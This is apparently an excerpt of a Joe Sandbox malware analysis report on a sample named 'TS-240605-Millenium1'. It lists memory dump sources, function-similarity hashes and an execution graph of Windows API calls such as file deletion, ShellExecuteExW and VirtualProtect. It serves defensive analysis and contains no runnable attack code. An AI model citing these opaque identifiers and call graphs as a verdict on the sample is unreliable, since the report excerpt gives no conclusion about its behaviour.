                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentImageNonwritableUnwind
                                                                                          • String ID: csm
                                                                                          • API String ID: 451473138-1018135373
                                                                                          • Opcode ID: 88d75f8372be57577a220e465c4aa8d65e851ebfefcdd899ecde71752cd89d28
                                                                                          • Instruction ID: 3e254eb058274db80f329d4f6bdb0b1a4564a01dbbbef0ed088735ea23cff000
                                                                                          • Opcode Fuzzy Hash: 88d75f8372be57577a220e465c4aa8d65e851ebfefcdd899ecde71752cd89d28
                                                                                          • Instruction Fuzzy Hash: 7A51D572B19A028ADB18EB17E444A7C73A1EB44FA4F1081F6DA5D437A8DF3DE861C701
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: abort$CreateFrameInfo
                                                                                          • String ID: csm
                                                                                          • API String ID: 2697087660-1018135373
                                                                                          • Opcode ID: a8b8ee24cb783e7d293a6e1db454b28b1bfc46eb23a73e5049af87221528bbc6
                                                                                          • Instruction ID: 6c548b89e410d91d6acf8a4d69b70324756b5b1b9ef40ebb5ab467b027ff0735
                                                                                          • Opcode Fuzzy Hash: a8b8ee24cb783e7d293a6e1db454b28b1bfc46eb23a73e5049af87221528bbc6
                                                                                          • Instruction Fuzzy Hash: 1F511C73719B4186D660AB26E44027E77A4FB89FA1F1401B6EB8D47B65CF3CE461CB01
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Name::operator+
                                                                                          • String ID: void$void
                                                                                          • API String ID: 2943138195-3746155364
                                                                                          • Opcode ID: d81aed41cb4c8c5c69bd061dfd49733f36ea67ee8bb27e73bf8cb873ba0293ca
                                                                                          • Instruction ID: 6a3847a797ea34b0243600d97617f3cdeba82360af4f26f101c998dbfe1bd0e4
                                                                                          • Opcode Fuzzy Hash: d81aed41cb4c8c5c69bd061dfd49733f36ea67ee8bb27e73bf8cb873ba0293ca
                                                                                          • Instruction Fuzzy Hash: 373105A2F18B559DFB01DBA5E8400FC37B0BB48B58F4405B6EA4E53A69DF3C9164C750
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileHeader$ExceptionRaise
                                                                                          • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                                                          • API String ID: 3685223789-3176238549
                                                                                          • Opcode ID: 161e8b28e34caca24568961a6528755d3751e4ffa6d3c1bec0c9a5cac7a2823b
                                                                                          • Instruction ID: 17a2e61351ae8dc12e7991a8cfa1d336490933007049f6bf365d772dc3632de2
                                                                                          • Opcode Fuzzy Hash: 161e8b28e34caca24568961a6528755d3751e4ffa6d3c1bec0c9a5cac7a2823b
                                                                                          • Instruction Fuzzy Hash: 690175A1B19D46A1EE40EB16F450178A360FF80F64F4854F3E51E07679EF6CE568C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFileHeaderRaise
                                                                                          • String ID: csm
                                                                                          • API String ID: 2573137834-1018135373
                                                                                          • Opcode ID: 96783e5d5ee86e7ed91570add2de904558e3ade983638e121ecc73efc59d9239
                                                                                          • Instruction ID: cbebe9d87d3f32192772af2eaa90a002eec98cf13a5b03ff9fcc6ff7f3e1d358
                                                                                          • Opcode Fuzzy Hash: 96783e5d5ee86e7ed91570add2de904558e3ade983638e121ecc73efc59d9239
                                                                                          • Instruction Fuzzy Hash: 86112E72618F8182EB618B16F840269B7E5FB88F99F5842B1DF8C07768DF3DD5618700
                                                                                          APIs
                                                                                            • Part of subcall function 00007FFE1A456E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4529EE), ref: 00007FFE1A456E56
                                                                                          • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A45F45A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: abortterminate
                                                                                          • String ID: csm$f
                                                                                          • API String ID: 661698970-629598281
                                                                                          • Opcode ID: f31257b661c57643b6b4b1793288747ab2a9155158c122d579431834bbccefac
                                                                                          • Instruction ID: 466f39f7d2c6ad8747c7229578763f3ef958adfb448de98c0d7c4ff533c0d341
                                                                                          • Opcode Fuzzy Hash: f31257b661c57643b6b4b1793288747ab2a9155158c122d579431834bbccefac
                                                                                          • Instruction Fuzzy Hash: 70E06C71E08B5141DB507B23B14017D6664AF56F75F1480F6DB4807666CF3CD4B08702
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,?,00007FFE1A456CE9,?,?,?,?,00007FFE1A460582,?,?,?,?,?), ref: 00007FFE1A456E83
                                                                                          • SetLastError.KERNEL32(?,?,?,00007FFE1A456CE9,?,?,?,?,00007FFE1A460582,?,?,?,?,?), ref: 00007FFE1A456F0C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 1452528299-0
                                                                                          • Opcode ID: 29fbcb28d85caf8942357daff49778de6b87ab13b42ab574bfe6367f35ca65f9
                                                                                          • Instruction ID: 33c700dcbbda43727ad60f5bfec39fe087911570393653a7a61029dbca3fc842
                                                                                          • Opcode Fuzzy Hash: 29fbcb28d85caf8942357daff49778de6b87ab13b42ab574bfe6367f35ca65f9
                                                                                          • Instruction Fuzzy Hash: 181136A1F0DE4282FA55AB67A84417462A1AF44FB4F084AF6E93E077F5DF2CB4618710

                                                                                          Execution Graph

                                                                                          Execution Coverage:10%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:3.8%
                                                                                          Total number of Nodes:1722
                                                                                          Total number of Limit Nodes:39
                                                                                          execution_graph 26584 361025 29 API calls 26585 364c20 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26661 362620 97 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26662 38ca20 21 API calls _free 26664 382610 RaiseException std::_Xinvalid_argument _com_error::_com_error 26589 37c000 28 API calls 26590 361075 44 API calls 24806 38067c 14 API calls ___delayLoadHelper2@8 26591 388870 QueryPerformanceFrequency QueryPerformanceCounter 26670 393665 21 API calls 2 library calls 25973 36b45f 25979 36b469 25973->25979 25974 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25976 36b50b 25974->25976 25975 36b5b6 25977 36b5dd SetFilePointer 25975->25977 25978 36b5fa GetLastError 25977->25978 25980 36b48d 25977->25980 25978->25980 25979->25975 25979->25977 25979->25980 25981 36b1e6 79 API calls 25979->25981 25980->25974 25981->25975 26597 391850 51 API calls 26501 37f05c 26507 37f07f 26501->26507 26502 37d5dd 6 API calls 26510 37ea83 _wcslen _wcsrchr 26502->26510 26504 37f717 26505 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26504->26505 26506 37f732 26505->26506 26507->26510 26532 37fafc 26507->26532 26508 37ed57 SetWindowTextW 26508->26510 26510->26502 26510->26504 26510->26508 26511 36dd18 5 API calls 26510->26511 26513 3866ae 22 API calls 26510->26513 26515 37eb4b SetFileAttributesW 26510->26515 26520 37d41c 100 API calls 26510->26520 26523 37f73c 26510->26523 26528 37ef75 SendMessageW 26510->26528 26553 37c5dd GetCurrentDirectoryW 26510->26553 26555 36c3de 11 API calls 26510->26555 26556 36c367 FindClose 26510->26556 26557 37d76e 76 API calls 3 library calls 26510->26557 26511->26510 26513->26510 26517 37ec05 GetFileAttributesW 26515->26517 26531 37eb65 _abort _wcslen 26515->26531 26517->26510 26519 37ec17 DeleteFileW 26517->26519 26519->26510 26521 37ec28 26519->26521 26522 37ef35 GetDlgItem SetWindowTextW SendMessageW 26520->26522 26525 364c00 _swprintf 51 API calls 26521->26525 26522->26510 26558 3813f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 26523->26558 26527 37ec48 GetFileAttributesW 26525->26527 26526 37f741 26527->26521 26529 37ec5d MoveFileW 26527->26529 26528->26510 26529->26510 26530 37ec75 MoveFileExW 26529->26530 26530->26510 26531->26510 26531->26517 26554 36d8ac 51 API calls 2 library calls 26531->26554 26533 37fb06 _abort _wcslen 26532->26533 26534 37fd7e 26533->26534 26537 36bccb 8 API calls 26533->26537 26535 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26534->26535 26536 37fd8f 26535->26536 26536->26510 26538 37fc54 26537->26538 26539 37fc73 ShellExecuteExW 26538->26539 26559 36d563 8 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26538->26559 26539->26534 26544 37fc86 26539->26544 26541 37fc6b 26541->26539 26542 37fcb8 26560 38004d 6 API calls 26542->26560 26543 37fd0e CloseHandle 26546 37fd1c 26543->26546 26544->26542 26544->26543 26547 37fcae ShowWindow 26544->26547 26546->26534 26549 37fd75 ShowWindow 26546->26549 26547->26542 26548 37fcd0 26548->26543 26550 37fce3 GetExitCodeProcess 26548->26550 26549->26534 26550->26543 26551 37fcf6 26550->26551 26551->26543 26553->26510 26554->26531 26555->26510 26556->26510 26557->26510 26558->26526 26559->26541 26560->26548 26564 38d240 26565 38d24b 26564->26565 26567 38d274 26565->26567 26568 38d270 26565->26568 26570 38d55a 26565->26570 26577 38d2a0 DeleteCriticalSection 26567->26577 26571 38d2e8 _free 5 API calls 26570->26571 26572 38d581 26571->26572 26573 38d59f InitializeCriticalSectionAndSpinCount 26572->26573 26576 38d58a 26572->26576 26573->26576 26574 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26575 38d5b6 26574->26575 26575->26565 26576->26574 26577->26568 26599 38239f 9 API calls 2 library calls 24363 38aaba 24374 38e180 24363->24374 24369 38bafa _free 20 API calls 24370 38ab0c 24369->24370 24371 38aae2 24391 38bafa 24371->24391 24373 38aad7 24373->24369 24375 38e189 24374->24375 24376 38aacc 24374->24376 24397 38e077 24375->24397 24378 38e580 GetEnvironmentStringsW 24376->24378 24379 38e597 24378->24379 24389 38e5ea 24378->24389 24380 38e59d WideCharToMultiByte 24379->24380 24383 38e5b9 24380->24383 24380->24389 24381 38aad1 24381->24373 24390 38ab12 26 API calls 3 library calls 24381->24390 24382 38e5f3 FreeEnvironmentStringsW 24382->24381 24384 38bc8e __vsnwprintf_l 21 API calls 24383->24384 24385 38e5bf 24384->24385 24386 38e5dc 24385->24386 24387 38e5c6 WideCharToMultiByte 24385->24387 24388 38bafa _free 20 API calls 24386->24388 24387->24386 24388->24389 24389->24381 24389->24382 24390->24371 24392 38bb05 RtlFreeHeap 24391->24392 24396 38bb2e _free 24391->24396 24393 38bb1a 24392->24393 24392->24396 24584 38bc7b 20 API calls _free 24393->24584 24395 38bb20 GetLastError 24395->24396 24396->24373 24417 38b9a5 GetLastError 24397->24417 24399 38e084 24438 38e19e 24399->24438 24401 38e08c 24447 38de0b 24401->24447 24404 38e0a3 24404->24376 24407 38e0e6 24409 38bafa _free 20 API calls 24407->24409 24409->24404 24411 38e0e1 24471 38bc7b 20 API calls _free 24411->24471 24413 38e12a 24413->24407 24472 38dce1 26 API calls 24413->24472 24414 38e0fe 24414->24413 24415 38bafa _free 20 API calls 24414->24415 24415->24413 24418 38b9bb 24417->24418 24419 38b9c7 24417->24419 24473 38d4ab 11 API calls 2 library calls 24418->24473 24474 38d786 20 API calls _free 24419->24474 24422 38b9d3 24425 38b9db 24422->24425 24475 38d501 11 API calls 2 library calls 24422->24475 24423 38b9c1 24423->24419 24424 38ba10 SetLastError 24423->24424 24424->24399 24427 38bafa _free 20 API calls 24425->24427 24429 38b9e1 24427->24429 24428 38b9f0 24428->24425 24430 38b9f7 24428->24430 24431 38ba1c SetLastError 24429->24431 24476 38b810 20 API calls _free 24430->24476 24477 38b584 38 API calls _abort 24431->24477 24434 38ba02 24436 38bafa _free 20 API calls 24434->24436 24437 38ba09 24436->24437 24437->24424 24437->24431 24439 38e1aa __FrameHandler3::FrameUnwindToState 24438->24439 24440 38b9a5 _unexpected 38 API calls 24439->24440 24441 38e1b4 24440->24441 24445 38e238 _abort 24441->24445 24446 38bafa _free 20 API calls 24441->24446 24478 38b584 38 API calls _abort 24441->24478 24479 38d281 EnterCriticalSection 24441->24479 24480 38e22f LeaveCriticalSection _abort 24441->24480 24445->24401 24446->24441 24481 386dd4 24447->24481 24450 38de2c GetOEMCP 24452 38de55 24450->24452 24451 38de3e 24451->24452 24453 38de43 GetACP 24451->24453 24452->24404 24454 38bc8e 24452->24454 24453->24452 24455 38bccc 24454->24455 24459 38bc9c _free 24454->24459 24492 38bc7b 20 API calls _free 24455->24492 24457 38bcb7 RtlAllocateHeap 24458 38bcca 24457->24458 24457->24459 24458->24407 24461 38e240 24458->24461 24459->24455 24459->24457 24491 38a2ec 7 API calls 2 library calls 24459->24491 24462 38de0b 40 API calls 24461->24462 24463 38e25f 24462->24463 24465 38e2b0 IsValidCodePage 24463->24465 24468 38e266 24463->24468 24470 38e2d5 _abort 24463->24470 24467 38e2c2 GetCPInfo 24465->24467 24465->24468 24466 38e0d9 24466->24411 24466->24414 24467->24468 24467->24470 24503 3810f9 24468->24503 24493 38dee3 GetCPInfo 24470->24493 24471->24407 24472->24407 24473->24423 24474->24422 24475->24428 24476->24434 24479->24441 24480->24441 24482 386df1 24481->24482 24488 386de7 24481->24488 24483 38b9a5 _unexpected 38 API calls 24482->24483 24482->24488 24484 386e12 24483->24484 24489 38bf86 38 API calls __fassign 24484->24489 24486 386e2b 24490 38bfb3 38 API calls __fassign 24486->24490 24488->24450 24488->24451 24489->24486 24490->24488 24491->24459 24492->24458 24494 38dfc7 24493->24494 24496 38df1d 24493->24496 24498 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24494->24498 24510 38efd8 24496->24510 24500 38e073 24498->24500 24500->24468 24502 38d1c8 __vsnwprintf_l 43 API calls 24502->24494 24504 381101 24503->24504 24505 381102 IsProcessorFeaturePresent 24503->24505 24504->24466 24507 381314 24505->24507 24583 3812d7 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 24507->24583 24509 3813f7 24509->24466 24511 386dd4 __fassign 38 API calls 24510->24511 24512 38eff8 MultiByteToWideChar 24511->24512 24514 38f0ce 24512->24514 24515 38f036 24512->24515 24516 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24514->24516 24517 38bc8e __vsnwprintf_l 21 API calls 24515->24517 24520 38f057 _abort __vsnwprintf_l 24515->24520 24518 38df7e 24516->24518 24517->24520 24524 38d1c8 24518->24524 24519 38f0c8 24529 38d213 20 API calls _free 24519->24529 24520->24519 24522 38f09c MultiByteToWideChar 24520->24522 24522->24519 24523 38f0b8 GetStringTypeW 24522->24523 24523->24519 24525 386dd4 __fassign 38 API calls 24524->24525 24526 38d1db 24525->24526 24530 38cfab 24526->24530 24529->24514 24531 38cfc6 __vsnwprintf_l 24530->24531 24532 38cfec MultiByteToWideChar 24531->24532 24533 38d1a0 24532->24533 24534 38d016 24532->24534 24535 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24533->24535 24537 38bc8e __vsnwprintf_l 21 API calls 24534->24537 24539 38d037 __vsnwprintf_l 24534->24539 24536 38d1b3 24535->24536 24536->24502 24537->24539 24538 38d080 MultiByteToWideChar 24540 38d099 24538->24540 24552 38d0ec 24538->24552 24539->24538 24539->24552 24557 38d5bc 24540->24557 24544 38d0fb 24546 38d11c __vsnwprintf_l 24544->24546 24549 38bc8e __vsnwprintf_l 21 API calls 24544->24549 24545 38d0c3 24547 38d5bc __vsnwprintf_l 11 API calls 24545->24547 24545->24552 24548 38d191 24546->24548 24550 38d5bc __vsnwprintf_l 11 API calls 24546->24550 24547->24552 24565 38d213 20 API calls _free 24548->24565 24549->24546 24553 38d170 24550->24553 24566 38d213 20 API calls _free 24552->24566 24553->24548 24554 38d17f WideCharToMultiByte 24553->24554 24554->24548 24555 38d1bf 24554->24555 24567 38d213 20 API calls _free 24555->24567 24568 38d2e8 24557->24568 24561 38d5ec 24563 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24561->24563 24562 38d62c LCMapStringW 24562->24561 24564 38d0b0 24563->24564 24564->24544 24564->24545 24564->24552 24565->24552 24566->24533 24567->24552 24569 38d318 24568->24569 24572 38d314 24568->24572 24569->24561 24575 38d644 10 API calls 3 library calls 24569->24575 24570 38d338 24570->24569 24573 38d344 GetProcAddress 24570->24573 24572->24569 24572->24570 24576 38d384 24572->24576 24574 38d354 _free 24573->24574 24574->24569 24575->24562 24577 38d3a5 LoadLibraryExW 24576->24577 24581 38d39a 24576->24581 24578 38d3da 24577->24578 24579 38d3c2 GetLastError 24577->24579 24578->24581 24582 38d3f1 FreeLibrary 24578->24582 24579->24578 24580 38d3cd LoadLibraryExW 24579->24580 24580->24578 24581->24572 24582->24581 24583->24509 24584->24395 24585 3610b5 24590 36668f 24585->24590 24587 3610ba 24598 381932 29 API calls 24587->24598 24589 3610c4 24591 36669b __EH_prolog3 24590->24591 24599 36d467 GetCurrentProcess GetProcessAffinityMask 24591->24599 24593 3666a5 24600 3711a5 41 API calls __EH_prolog3 24593->24600 24595 3666fc 24601 3668b3 GetCurrentProcess GetProcessAffinityMask 24595->24601 24597 366719 24597->24587 24598->24589 24599->24593 24600->24595 24601->24597 24605 38bab0 24613 38d3ff 24605->24613 24608 38bac4 24610 38bacc 24611 38bad9 24610->24611 24621 38bae0 11 API calls 24610->24621 24614 38d2e8 _free 5 API calls 24613->24614 24615 38d426 24614->24615 24616 38d43e TlsAlloc 24615->24616 24617 38d42f 24615->24617 24616->24617 24618 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24617->24618 24619 38baba 24618->24619 24619->24608 24620 38ba29 20 API calls _free 24619->24620 24620->24610 24621->24608 24623 36d4bd 24624 36d4cf _abort 24623->24624 24627 3731c2 24624->24627 24630 373184 GetCurrentProcess GetProcessAffinityMask 24627->24630 24631 36d526 24630->24631 26603 3800b3 DialogBoxParamW 24647 3810a8 24648 3810b2 24647->24648 24651 380d3a 24648->24651 24677 380a98 24651->24677 24653 380d4a 24654 380da7 24653->24654 24665 380dcb 24653->24665 24655 380cd8 DloadReleaseSectionWriteAccess 6 API calls 24654->24655 24656 380db2 RaiseException 24655->24656 24657 380fa0 24656->24657 24658 380e43 LoadLibraryExA 24659 380ea4 24658->24659 24660 380e56 GetLastError 24658->24660 24664 380eb6 24659->24664 24666 380eaf FreeLibrary 24659->24666 24661 380e69 24660->24661 24662 380e7f 24660->24662 24661->24659 24661->24662 24667 380cd8 DloadReleaseSectionWriteAccess 6 API calls 24662->24667 24663 380f14 GetProcAddress 24668 380f24 GetLastError 24663->24668 24673 380f72 24663->24673 24664->24663 24664->24673 24665->24658 24665->24659 24665->24664 24665->24673 24666->24664 24671 380e8a RaiseException 24667->24671 24669 380f37 24668->24669 24672 380cd8 DloadReleaseSectionWriteAccess 6 API calls 24669->24672 24669->24673 24671->24657 24674 380f58 RaiseException 24672->24674 24686 380cd8 24673->24686 24675 380a98 ___delayLoadHelper2@8 6 API calls 24674->24675 24676 380f6f 24675->24676 24676->24673 24678 380aca 24677->24678 24679 380aa4 24677->24679 24678->24653 24694 380b41 24679->24694 24681 380aa9 24682 380ac5 24681->24682 24697 380c6a 24681->24697 24702 380acb GetModuleHandleW GetProcAddress GetProcAddress 24682->24702 24685 380d13 24685->24653 24687 380cea 24686->24687 24688 380d0c 24686->24688 24689 380b41 DloadReleaseSectionWriteAccess 3 API calls 24687->24689 24688->24657 24690 380cef 24689->24690 24691 380d07 24690->24691 24692 380c6a DloadProtectSection 3 API calls 24690->24692 24705 380d0e GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24691->24705 24692->24691 24703 380acb GetModuleHandleW GetProcAddress GetProcAddress 24694->24703 24696 380b46 24696->24681 24699 380c7f DloadProtectSection 24697->24699 24698 380c85 24698->24682 24699->24698 24700 380cba VirtualProtect 24699->24700 24704 380b80 VirtualQuery GetSystemInfo 24699->24704 24700->24698 24702->24685 24703->24696 24704->24700 24705->24688 26605 37b4a0 ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 26607 361890 86 API calls Concurrency::cancel_current_task 26674 38e680 GetProcessHeap 26612 38ccf0 31 API calls 2 library calls 26677 38caf0 71 API calls _free 26678 392ef0 IsProcessorFeaturePresent 26613 381cf3 20 API calls 26679 38daed 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26614 3624e0 26 API calls std::bad_exception::bad_exception 24817 37dae0 24818 37daf2 24817->24818 24992 361366 24818->24992 24821 37e250 25089 37f9ee 24821->25089 24822 37db5c 24825 37dbd0 24822->24825 24826 37db6d 24822->24826 24905 37db76 24822->24905 24824 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24828 37e555 24824->24828 24833 37dc63 GetDlgItemTextW 24825->24833 24834 37dbe6 24825->24834 24829 37db71 24826->24829 24830 37dbad 24826->24830 24839 370597 53 API calls 24829->24839 24829->24905 24840 37dc94 KiUserCallbackDispatcher 24830->24840 24830->24905 24831 37e26b SendMessageW 24832 37e279 24831->24832 24836 37e293 GetDlgItem SendMessageW 24832->24836 24837 37e282 SendDlgItemMessageW 24832->24837 24833->24830 24835 37dca0 24833->24835 24838 370597 53 API calls 24834->24838 24842 37dcb5 GetDlgItem 24835->24842 24990 37dca9 24835->24990 25108 37c5dd GetCurrentDirectoryW 24836->25108 24837->24836 24845 37dc03 SetDlgItemTextW 24838->24845 24846 37db90 24839->24846 24840->24905 24843 37dcec SetFocus 24842->24843 24844 37dcc9 SendMessageW SendMessageW 24842->24844 24850 37dcfc 24843->24850 24864 37dd08 24843->24864 24844->24843 24851 37dc0e 24845->24851 25132 361273 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24846->25132 24847 37e2c3 GetDlgItem 24848 37e2e6 SetWindowTextW 24847->24848 24849 37e2e0 24847->24849 25109 37cb49 GetClassNameW 24848->25109 24849->24848 24855 370597 53 API calls 24850->24855 24859 37dc1b GetMessageW 24851->24859 24851->24905 24853 37e196 24857 370597 53 API calls 24853->24857 24860 37dd06 24855->24860 24856 37db97 24865 37e531 SetDlgItemTextW 24856->24865 24856->24905 24861 37e1a6 SetDlgItemTextW 24857->24861 24863 37dc32 IsDialogMessageW 24859->24863 24859->24905 25002 37f7fc 24860->25002 24867 37e1ba 24861->24867 24863->24851 24869 37dc41 TranslateMessage DispatchMessageW 24863->24869 24871 370597 53 API calls 24864->24871 24865->24905 24873 370597 53 API calls 24867->24873 24869->24851 24875 37dd3f 24871->24875 24872 37dd77 24877 37dd96 24872->24877 25134 36bccb 24872->25134 24914 37e1dd _wcslen 24873->24914 24874 37e331 24879 37e361 24874->24879 24884 370597 53 API calls 24874->24884 24880 364c00 _swprintf 51 API calls 24875->24880 25014 36baf1 24877->25014 24878 37ea07 121 API calls 24878->24874 24881 37e419 24879->24881 24885 37ea07 121 API calls 24879->24885 24880->24860 24886 37e4c0 24881->24886 24921 37e4a1 24881->24921 24932 370597 53 API calls 24881->24932 24889 37e344 SetDlgItemTextW 24884->24889 24890 37e37c 24885->24890 24892 37e4d2 24886->24892 24893 37e4c9 EnableWindow 24886->24893 24896 370597 53 API calls 24889->24896 24899 37e3b3 24890->24899 24906 37e38e 24890->24906 24891 37dd90 25137 37cebf 9 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24891->25137 24901 37e4ef 24892->24901 25157 361323 GetDlgItem EnableWindow 24892->25157 24893->24892 24894 37ddba 25025 37cbb6 SetCurrentDirectoryW 24894->25025 24895 37ddaf GetLastError 24895->24894 24902 37e358 SetDlgItemTextW 24896->24902 24898 370597 53 API calls 24898->24905 24907 37e40c 24899->24907 24937 37ea07 121 API calls 24899->24937 24903 37e516 24901->24903 24915 37e50e SendMessageW 24901->24915 24902->24879 24903->24905 24916 370597 53 API calls 24903->24916 24904 37ddce 24909 37ddd7 GetLastError 